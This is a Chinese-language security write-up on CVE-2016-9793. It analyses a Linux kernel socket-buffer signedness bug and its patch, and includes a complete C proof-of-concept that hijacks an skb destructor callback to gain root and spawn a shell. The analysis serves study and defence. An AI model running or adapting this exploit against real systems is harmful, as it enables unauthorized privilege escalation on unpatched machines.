漏洞分析
Linux kernel 4.8.13 及之前版本中,net/core/sock.c 文件的 sock_setsockopt 函数存在安全漏洞。该漏洞源于程序没有正确地处理 sk_sndbuf 和 sk_rcvbuf 的负值。拥有 CAP_NET_ADMIN 权限的本地攻击者可通过 SO_SNDBUFFORCE 或 SO_RCVBUFFORCE 选项利用该漏洞,造成拒绝服务(内存损坏和系统崩溃)。
影响版本
Linux kernel 3.11 ~ 4.8.13(4.8.14 中已修复)
源码分析(以4.8.13为例)
下载地址
sock_setsockopt 中关于 sk_sndbuf 和 sk_rcvbuf 的处理:
set_sndbuf:
case SO_SNDBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_wmem_max);
sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
/* Wake up sending tasks if we upped the value. */
sk->sk_write_space(sk);
break;
set_rcvbuf:
case SO_RCVBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_rmem_max);
sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
/*
* We double it on the way in to account for
* "struct sk_buff" etc. overhead. Applications
* assume that the SO_RCVBUF setting they make will
* allow that much actual data to be received on that
* socket.
*
* Applications are unaware that "struct sk_buff" and
* other overheads allocate from the receive buffer
* during socket buffer allocation.
*
* And after considering the possible alternatives,
* returning the value we actually used in getsockopt
* is the most desirable behavior.
*/
sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
break;
max_t定义如下:
/*
 * max_t - return the larger of x and y after converting both to `type`.
 *
 * Each argument is evaluated exactly once (GNU statement expression).
 * Note that when `type` is unsigned, a negative argument is converted to a
 * large positive value and therefore compares greater than small constants.
 */
#define max_t(type, x, y) ({            \
    type __max1 = (x);                  \
    type __max2 = (y);                  \
    __max1 > __max2 ? __max1: __max2; })
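以set_sndbuf为例,max_t(u32, val * 2, SOCK_MIN_SNDBUF) 即以 u32 类型(无符号整数)比较 val * 2 和 SOCK_MIN_SNDBUF 的大小。当 val * 2 为负数时,它会被当作一个很大的无符号数参与比较(即出现“-1 > 100”这样的情况),比较结果仍然取 val * 2;该结果再赋值给 int 类型的 sk_sndbuf 后就成为负值,从而导致被攻击。需要注意的是,SO_SNDBUFFORCE/SO_RCVBUFFORCE 会直接跳转到 set_sndbuf/set_rcvbuf 标签处,不经过上面 min_t 对 sysctl_wmem_max/sysctl_rmem_max 的上限限制。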
POC
PS:需要自行修改偏移。并且条件竞争存在一定概率,需多运行几遍才可提权
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * Hard-coded kernel addresses used as the targets of the two function
 * pointers below. They are fixed constants, so they only match one specific
 * kernel build; the article notes that the offsets must be adjusted.
 */
#define COMMIT_CREDS 0xffffffff810a4b80
#define PREPARE_KERNEL_CRED 0xffffffff810a4f30
/* Function-pointer types used to call the two routines by raw address. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
/*
 * Calls prepare_kernel_cred(0) and passes its result to commit_creds().
 * Both calls go through the fixed addresses above. The function's address is
 * stored as the callback member of ubuf_info elsewhere in this PoC.
 */
void get_root(void) {
commit_creds(prepare_kernel_cred(0));
}
/*
 * Userspace mirror of the kernel's struct ubuf_info. Every member is stored
 * as a 64-bit integer; the trailing comments give the kernel-side type.
 */
struct ubuf_info_t {
    uint64_t callback;          // void (*callback)(struct ubuf_info *, bool)
    uint64_t ctx;               // void *
    uint64_t desc;              // unsigned long
};

/*
 * Userspace mirror of the kernel's struct skb_shared_info, as laid out on a
 * 64-bit kernel. Only tx_flags and destructor_arg are written by the PoC;
 * the other members exist to keep the offsets right.
 */
struct skb_shared_info_t {
    uint8_t nr_frags;           // unsigned char
    uint8_t tx_flags;           // __u8
    uint16_t gso_size;          // unsigned short
    uint16_t gso_segs;          // unsigned short
    uint16_t gso_type;          // unsigned short
    uint64_t frag_list;         // struct sk_buff *
    uint64_t hwtstamps;         // struct skb_shared_hwtstamps
    uint32_t tskey;             // u32
    uint32_t ip6_frag_id;       // __be32
    uint32_t dataref;           // atomic_t
    uint64_t destructor_arg;    // void *
    // skb_frag_t frags[MAX_SKB_FRAGS]: 17 entries of 16 bytes each
    // (x86_64 with 4 KiB pages). Same total size as the former [16][17].
    uint8_t frags[17][16];
};
// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
// SNDBUF is the value passed to setsockopt(); SHINFO is the userspace address
// at which the fake skb_shared_info is placed (its page is mmapped in main).
#define SNDBUF 0xffffff00
#define SHINFO 0x00000000fffffed0
// Fake ubuf_info whose callback member holds the address of get_root.
struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
// Typed view of the fixed SHINFO address.
struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;
// Bit OR-ed into tx_flags by skb_thr.
#define SKBTX_DEV_ZEROCOPY (1 << 3)
/*
 * Thread body that never returns: it keeps storing the address of ubuf_info
 * into skb_shared_info->destructor_arg and keeps the SKBTX_DEV_ZEROCOPY bit
 * set in skb_shared_info->tx_flags. The argument is unused.
 */
void *skb_thr(void *arg) {
    for (;;) {
        skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
        skb_shared_info->tx_flags = skb_shared_info->tx_flags | SKBTX_DEV_ZEROCOPY;
    }
}
/* Socket pair created in main(); write_thr writes to sockets[1]. */
int sockets[2];

/*
 * Thread body: performs a single one-byte write on sockets[1], then checks
 * the effective result with getuid(). If the uid is 0 it replaces the process
 * image with /bin/sh; otherwise (or if execl fails) it reports failure.
 *
 * Returns NULL so that pthread_join() in main() receives a defined value.
 */
void *write_thr(void *arg) {
    (void)arg;
    // Write blocks until setsockopt(SO_SNDBUF).
    write(sockets[1], "\x5c", 1);
    if (getuid() == 0) {
        printf("[+] got r00t\n");
        // The variadic sentinel must be a null pointer of type char *.
        execl("/bin/sh", "sh", (char *)NULL);
        perror("execl()");
    }
    printf("[-] something went wrong\n");
    return NULL;
}
/*
 * PoC driver. In order, it:
 *   1. maps the page containing SHINFO at a fixed address,
 *   2. starts skb_thr,
 *   3. opens an AF_LOCAL stream socket pair,
 *   4. sets SO_SNDBUFFORCE on sockets[1] to SNDBUF,
 *   5. starts write_thr,
 *   6. issues SO_SNDBUF on the same socket to wake the blocked write,
 *   7. closes both sockets and joins write_thr.
 * Exits with EXIT_FAILURE as soon as any setup step fails.
 */
int main(void) {
    void *addr;
    int rv;
    uint32_t sndbuf;

    addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000,
                PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
                -1, 0);
    if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {
        perror("mmap()");
        exit(EXIT_FAILURE);
    }
    printf("[.] userspace payload mmapped at %p\n", addr);

    pthread_t skb_th;
    rv = pthread_create(&skb_th, 0, skb_thr, NULL);
    if (rv != 0) {
        // pthread_create() returns the error number and does not set errno,
        // so perror() would print an unrelated message here.
        fprintf(stderr, "pthread_create(): %s\n", strerror(rv));
        exit(EXIT_FAILURE);
    }
    usleep(10000);
    printf("[.] overwriting thread started\n");

    rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
    if (rv != 0) {
        perror("socketpair()");
        exit(EXIT_FAILURE);
    }
    printf("[.] sockets opened\n");

    sndbuf = SNDBUF;
    rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
                    &sndbuf, sizeof(sndbuf));
    if (rv != 0) {
        perror("setsockopt()");
        exit(EXIT_FAILURE);
    }
    printf("[.] sock->sk_sndbuf set to 0x%x\n", SNDBUF * 2);

    pthread_t write_th;
    rv = pthread_create(&write_th, 0, write_thr, NULL);
    if (rv != 0) {
        fprintf(stderr, "pthread_create(): %s\n", strerror(rv));
        exit(EXIT_FAILURE);
    }
    usleep(10000);
    printf("[.] writing to socket\n");

    // Wake up blocked write.
    rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
                    &sndbuf, sizeof(sndbuf));
    if (rv != 0) {
        perror("setsockopt()");
        exit(EXIT_FAILURE);
    }
    usleep(10000);

    close(sockets[0]);
    close(sockets[1]);

    // The thread's return value is not used.
    pthread_join(write_th, NULL);
    return 0;
}
提权分析
通过test程序报错的调用链分析:
while (sent < len) {
size = len - sent;
/* Keep two messages in the pipe so it schedules better */
size = min_t(int, size, (sk->sk_sndbuf >> 1) - 64);
/* allow fallback to order-0 allocations */
size = min_t(int, size, SKB_MAX_HEAD(0) + UNIX_SKB_FRAGS_SZ);
data_len = max_t(int, 0, size - SKB_MAX_HEAD(0));
data_len = min_t(size_t, size, PAGE_ALIGN(data_len));
skb = sock_alloc_send_pskb(sk, size - data_len, data_len,
msg->msg_flags & MSG_DONTWAIT, &err,
get_order(UNIX_SKB_FRAGS_SZ));
该代码主要将 sk_sndbuf 与其他值进行一系列比较,最终得到 size 和 data_len,并调用 sock_alloc_send_pskb() 函数。
而传入的 size - data_len(即 header_len 参数)最终作为 __alloc_skb() 函数的 size 参数:
/*
 * __alloc_skb - allocate an sk_buff head and its data buffer.
 * @size:     requested data size in bytes (unsigned int)
 * @gfp_mask: allocation flags passed on to the allocators
 * @flags:    SKB_ALLOC_FCLONE selects skbuff_fclone_cache instead of
 *            skbuff_head_cache; SKB_ALLOC_RX adds __GFP_MEMALLOC when
 *            sk_memalloc_socks() is true
 * @node:     node argument forwarded to the allocators
 *
 * Returns the initialised skb, or NULL when either allocation fails.
 */
struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
int flags, int node)
{
struct kmem_cache *cache;
struct skb_shared_info *shinfo;
struct sk_buff *skb;
u8 *data;
bool pfmemalloc;
cache = (flags & SKB_ALLOC_FCLONE)
? skbuff_fclone_cache : skbuff_head_cache;
if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX))
gfp_mask |= __GFP_MEMALLOC;
/* Get the HEAD */
skb = kmem_cache_alloc_node(cache, gfp_mask & ~__GFP_DMA, node);
if (!skb)
goto out;
prefetchw(skb);
/* We do our best to align skb_shared_info on a separate cache
* line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
* aligned memory blocks, unless SLUB/SLAB debug is enabled.
* Both skb->head and skb_shared_info are cache line aligned.
*/
/* NOTE: size is an unsigned int, so for a value close to UINT_MAX the
* addition below wraps around and a much smaller buffer is requested.
*/
size = SKB_DATA_ALIGN(size);
size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
if (!data)
goto nodata;
/* kmalloc(size) might give us more room than requested.
* Put skb_shared_info exactly at the end of allocated zone,
* to allow max possible filling before reallocation.
*/
size = SKB_WITH_OVERHEAD(ksize(data));
prefetchw(data + size);
/*
* Only clear those fields we need to clear, not those that we will
* actually initialise below. Hence, don't put any more fields after
* the tail pointer in struct sk_buff!
*/
memset(skb, 0, offsetof(struct sk_buff, tail));
/* Account for allocated memory : skb + skb->head */
skb->truesize = SKB_TRUESIZE(size);
skb->pfmemalloc = pfmemalloc;
atomic_set(&skb->users, 1);
skb->head = data;
skb->data = data;
skb_reset_tail_pointer(skb);
/*
static inline void skb_reset_tail_pointer(struct sk_buff *skb)
{
skb->tail = skb->data;
}
*/
/* end is the tail plus the size recomputed from ksize() above. */
skb->end = skb->tail + size;
skb->mac_header = (typeof(skb->mac_header))~0U;
skb->transport_header = (typeof(skb->transport_header))~0U;
/* make sure we initialize shinfo sequentially */
shinfo = skb_shinfo(skb);
memset(shinfo, 0, offsetof(struct skb_shared_info, dataref));
atomic_set(&shinfo->dataref, 1);
kmemcheck_annotate_variable(shinfo->destructor_arg);
/* For fclone allocations, also initialise the companion skb2 entry. */
if (flags & SKB_ALLOC_FCLONE) {
struct sk_buff_fclones *fclones;
fclones = container_of(skb, struct sk_buff_fclones, skb1);
kmemcheck_annotate_bitfield(&fclones->skb2, flags1);
skb->fclone = SKB_FCLONE_ORIG;
atomic_set(&fclones->fclone_ref, 1);
fclones->skb2.fclone = SKB_FCLONE_CLONE;
fclones->skb2.pfmemalloc = pfmemalloc;
}
out:
return skb;
/* Data allocation failed: give the head back to its cache and return NULL. */
nodata:
kmem_cache_free(cache, skb);
skb = NULL;
goto out;
}
该函数主要申请一个 sk_buff 结构,并且对 head、end、tail 等成员赋值。需要注意的是,函数会先对 size 进行对齐,随后将 skb->tail 加上 size 的结果赋值给 skb->end。
而当执行 close(sockets[0]); 时会调用 skb_release_data(),其代码如下:
/*
 * skb_release_data - release the data buffer attached to @skb.
 *
 * For a cloned skb the dataref counter is decremented first, and the
 * function returns early while the result is non-zero. Otherwise each page
 * fragment is unreferenced, the destructor callback is invoked when
 * SKBTX_DEV_ZEROCOPY is set in tx_flags, any frag_list is freed, and finally
 * the head buffer is freed.
 */
static void skb_release_data(struct sk_buff *skb)
{
struct skb_shared_info *shinfo = skb_shinfo(skb);
int i;
if (skb->cloned &&
atomic_sub_return(skb->nohdr ? (1 << SKB_DATAREF_SHIFT) + 1 : 1,
&shinfo->dataref))
return;
for (i = 0; i < shinfo->nr_frags; i++)
__skb_frag_unref(&shinfo->frags[i]);
/*
* If skb buf is from userspace, we need to notify the caller
* the lower device DMA has done;
*/
if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
struct ubuf_info *uarg;
/* destructor_arg is used as a ubuf_info pointer without any
* validation; a non-NULL callback in it is called directly.
*/
uarg = shinfo->destructor_arg;
if (uarg->callback)
uarg->callback(uarg, true);
}
if (shinfo->frag_list)
kfree_skb_list(shinfo->frag_list);
skb_free_head(skb);
}
其中,当执行 skb_shinfo(skb) 时,返回值为 skb->end + skb->head。接着通过获取到的 shinfo 读取 destructor_arg 所指向的结构,从而调用其中的 callback 函数指针。
POC思路
- 申请0xfffff000~0x100000000这一页内存,方便后续利用。
- 创建新线程,重复对0xfffffed0处对应的 shinfo 结构赋值,从而劫持callback指针。
- 新建两个套接字,用以发送和接收信息。
- 通过 setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE, &sndbuf, sizeof(sndbuf)); 将 sk_sndbuf 设置为0xfffffe00。
- 新建线程,调用 sock 的 write 调用,从而实现将 skb->end 设置为0xfffffec0,skb->head 设置为0x10,即 shinfo=0xfffffed0。
- 最后通过 close(sockets[0]); 调用callback指针所指的函数,实现提权。
环境与复现
https://github.com/nuoye-blog/cve/tree/master/cve-2016-9793
漏洞修补
可以在 Linux kernel 4.8.14 版本中看到,max_t(u32, val * 2, SOCK_MIN_SNDBUF); 和 max_t(u32, val * 2, SOCK_MIN_RCVBUF); 被修改为了 max_t(int, val * 2, SOCK_MIN_SNDBUF); 以及 max_t(int, val * 2, SOCK_MIN_RCVBUF);。改为有符号比较后,负的 val * 2 不再大于最小值,sk_sndbuf/sk_rcvbuf 也就不会被设置为负数。
参考链接
CVE-2016-9793 Linux kernel 安全漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客,安全资讯平台 https://www.anquanke.com/vul/id/1123808
本文始发于微信公众号(星盟安全):CVE-2016-9793漏洞分析与利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论